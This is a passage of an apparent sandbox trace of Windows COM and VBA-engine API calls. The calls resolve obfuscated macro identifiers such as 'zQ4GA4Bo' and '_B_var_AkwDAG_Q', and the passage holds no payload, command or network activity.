pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.433] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.433] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.433] IUnknown:Release (This=0x665ba50) returned 0xb [0068.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc193a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_uUUwDBwB") returned 16 [0068.433] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uUUwDBwB", lHashVal=0x103dd8, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x44007700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x75005f00720061, ppTypeComp=0x44007700000000, pDummy=0x0) returned 0x0 [0068.433] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba255a | out: _Dst=0x145020) returned 0x0 [0068.433] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d60) returned 0x0 [0068.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.433] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.433] IUnknown:Release (This=0x665ba50) returned 0xb [0068.433] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.433] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.434] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.434] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.434] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.434] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.434] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.434] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.434] IUnknown:Release (This=0x665ba50) returned 0xb [0068.434] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.434] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.434] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.434] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.434] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.434] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.434] IUnknown:Release (This=0x665ba50) returned 0xb [0068.434] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.434] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.434] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.434] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.434] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.434] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.435] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.435] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.435] IUnknown:Release (This=0x665ba50) returned 0xb [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.435] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.435] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.435] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.435] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.435] IUnknown:Release (This=0x665ba50) returned 0xb [0068.435] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.435] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.435] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.435] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.435] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.435] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.435] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.435] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.435] IUnknown:Release (This=0x665ba50) returned 0xb [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.435] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.435] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.435] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.436] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.436] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.436] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.436] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.436] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.436] IUnknown:Release (This=0x665ba50) returned 0xb [0068.436] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.436] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.436] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.436] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.436] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.436] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.436] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.436] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.436] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.436] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.436] IUnknown:Release (This=0x665ba50) returned 0xb [0068.436] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.437] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.437] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24ae, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="zQ4GA4Bo") returned 9 [0068.437] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zQ4GA4Bo", lHashVal=0x105281, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24ae, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="zQ4GA4Bo") returned 9 [0068.437] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zQ4GA4Bo", lHashVal=0x105281, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24ae, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="zQ4GA4Bo") returned 9 [0068.437] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zQ4GA4Bo", lHashVal=0x105281, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.437] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zQ4GA4Bo") returned 0x105281 [0068.437] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="zQ4GA4Bo" | out: _Dst="zQ4GA4Bo") returned 0x0 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="zQ4GA4Bo") returned 9 [0068.437] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.437] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zQ4GA4Bo", lHashVal=0x105281, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.437] IUnknown:Release (This=0x665ba50) returned 0xb [0068.437] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.437] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zQ4GA4Bo", lHashVal=0x105281, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.437] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.437] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.437] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zQ4GA4Bo", lHashVal=0x105281, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.437] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.437] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.437] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zQ4GA4Bo", lHashVal=0x105281, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.437] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba24ae, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="zQ4GA4Bo") returned 9 [0068.437] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zQ4GA4Bo", lHashVal=0x105281, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.438] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.438] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba24ae | out: _Dst=0x67c2d60) returned 0x0 [0068.438] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zQ4GA4Bo") returned 0x102a0a [0068.438] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_zQ4GA4Bo" | out: _Dst="_B_var_zQ4GA4Bo") returned 0x0 [0068.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_zQ4GA4Bo") returned 16 [0068.438] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.438] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zQ4GA4Bo", lHashVal=0x102a0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.438] IUnknown:Release (This=0x665ba50) returned 0xb [0068.438] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.438] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zQ4GA4Bo", lHashVal=0x102a0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.438] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.438] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.438] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zQ4GA4Bo", lHashVal=0x102a0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.438] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.438] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.438] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zQ4GA4Bo", lHashVal=0x102a0a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.438] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.438] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.438] IUnknown:Release (This=0x665ba50) returned 0xb [0068.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc196a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_zQ4GA4Bo") returned 16 [0068.438] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zQ4GA4Bo", lHashVal=0x102a0a, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.438] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba24ae | out: _Dst=0x145020) returned 0x0 [0068.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25b2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AkwDAG_Q") returned 9 [0068.438] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AkwDAG_Q", lHashVal=0x10a98c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25b2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AkwDAG_Q") returned 9 [0068.439] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AkwDAG_Q", lHashVal=0x10a98c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25b2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AkwDAG_Q") returned 9 [0068.439] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AkwDAG_Q", lHashVal=0x10a98c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.439] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AkwDAG_Q") returned 0x10a98c [0068.439] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="AkwDAG_Q" | out: _Dst="AkwDAG_Q") returned 0x0 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="AkwDAG_Q") returned 9 [0068.439] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.439] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AkwDAG_Q", lHashVal=0x10a98c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.439] IUnknown:Release (This=0x665ba50) returned 0xb [0068.439] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.439] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AkwDAG_Q", lHashVal=0x10a98c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.439] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.439] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.439] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AkwDAG_Q", lHashVal=0x10a98c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.439] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.439] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.439] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AkwDAG_Q", lHashVal=0x10a98c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.439] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25b2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="AkwDAG_Q") returned 9 [0068.439] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AkwDAG_Q", lHashVal=0x10a98c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.440] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.440] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba25b2 | out: _Dst=0x67c2d60) returned 0x0 [0068.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AkwDAG_Q") returned 0x108115 [0068.440] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, 